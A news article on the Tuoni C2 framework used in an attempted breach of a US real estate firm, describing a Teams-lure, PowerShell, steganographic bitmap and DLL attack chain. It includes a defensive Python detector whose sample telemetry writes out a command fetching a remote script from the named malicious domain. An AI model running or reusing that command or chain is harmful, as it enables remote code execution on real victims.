Emerging Red Team Tool Tuoni C2 Used in Attempted Breach of US Real Estate Firm
October 26, 2025 – A US-based real estate firm was targeted in mid-October by a cyberattack leveraging the recently released Tuoni command-and-control (C2) framework, researchers at Morphisec revealed today. The incident highlights a growing trend of malicious actors adopting tools originally designed for legitimate penetration testing and red team exercises.
Tuoni, advertised as an advanced C2 framework for security professionals, became freely available as a “Community Edition” download from GitHub in early 2024. The attackers in this case used Tuoni’s ability to deliver stealthy, in-memory payloads. According to Shmuel Uzan, a Morphisec researcher, “The campaign leveraged the emerging Tuoni C2 framework…that delivers stealthy, in-memory payloads.”
The attack unfolded through a likely social engineering scheme involving Microsoft Teams impersonation, in which the attackers allegedly posed as trusted vendors or colleagues to trick an employee into executing a PowerShell command. This command downloaded a second PowerShell script from “kupaoquan[.]com,” which concealed a further payload within a bitmap image using steganographic techniques. The resulting execution of “TuoniAgent.dll” established a connection to the C2 server, granting the attackers potential remote control of the compromised machine.
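For defenders, the chain above is easier to catch as a sequence than as any single event. The following correlator is an added example (not Morphisec’s code or detection content) that scores the four stages the article describes over constructed Sysmon-style records; the domain and DLL name come from the article, while the event schema, field names and sample telemetry are assumptions for illustration.

```python
import re
from collections import defaultdict

# Indicators taken from the article; everything else in this block is assumed.
SUSPECT_DOMAIN = "kupaoquan.com"
AGENT_DLL = "tuoniagent.dll"

def _text(e):
    """Normalise the searchable text of an event (defanged [.] becomes .)."""
    return e.get("text", "").lower().replace("[.]", ".")

# One predicate per stage, in the order the article describes the chain:
# Teams -> PowerShell -> script fetched from the domain -> bitmap decode -> TuoniAgent.dll.
STAGES = [
    ("teams_spawns_powershell",
     lambda e: e["type"] == "process" and e.get("parent", "").lower() == "teams.exe"
               and e.get("image", "").lower() == "powershell.exe"),
    ("remote_script_download",
     lambda e: e["type"] in ("process", "scriptblock") and SUSPECT_DOMAIN in _text(e)),
    ("bitmap_payload_decode",
     lambda e: e["type"] == "scriptblock" and re.search(r"\.bmp\b", _text(e))
               and re.search(r"getpixel|lockbits", _text(e))),
    ("tuoni_agent_loaded",
     lambda e: e["type"] in ("imageload", "scriptblock") and AGENT_DLL in _text(e)),
]

def correlate(events):
    """Return {host: [stage names observed, in chain order]} for hosts with any hit."""
    seen = defaultdict(set)
    for e in events:
        for name, pred in STAGES:
            if pred(e):
                seen[e["host"]].add(name)
    order = [name for name, _ in STAGES]
    return {h: [s for s in order if s in hits] for h, hits in seen.items()}

def flag_hosts(events, min_stages=2):
    """Hosts on which at least min_stages of the chain were observed (sorted)."""
    return sorted(h for h, st in correlate(events).items() if len(st) >= min_stages)

# Constructed sample telemetry, not real logs: ws01 shows the full chain, ws02 is benign.
SAMPLE = [
    {"host": "ws01", "type": "process", "parent": "Teams.exe", "image": "powershell.exe",
     "text": "powershell.exe -c Invoke-WebRequest https://kupaoquan[.]com/update.ps1"},
    {"host": "ws01", "type": "scriptblock",
     "text": "$bmp = New-Object System.Drawing.Bitmap 'logo.bmp'; $bmp.GetPixel(0,0)"},
    {"host": "ws01", "type": "imageload", "text": "C:\\Users\\Public\\TuoniAgent.dll"},
    {"host": "ws02", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "text": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]
```

Requiring two or more stages keeps a lone Teams-spawned PowerShell from paging anyone, while still surfacing a host where the download and the bitmap decode appear together even if the final DLL load is never recorded.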
Morphisec noted potential signs of AI assistance in the initial loader’s code generation, citing scripted comments and a modular structure. This incident follows a September 2025 report from Check Point detailing the weaponization of the AI-powered tool HexStrike AI for accelerated vulnerability exploitation, further illustrating the evolving landscape of cyber threats. While the attack on the real estate firm was ultimately unsuccessful, it underscores the increasing misuse of legitimate security tools for malicious purposes.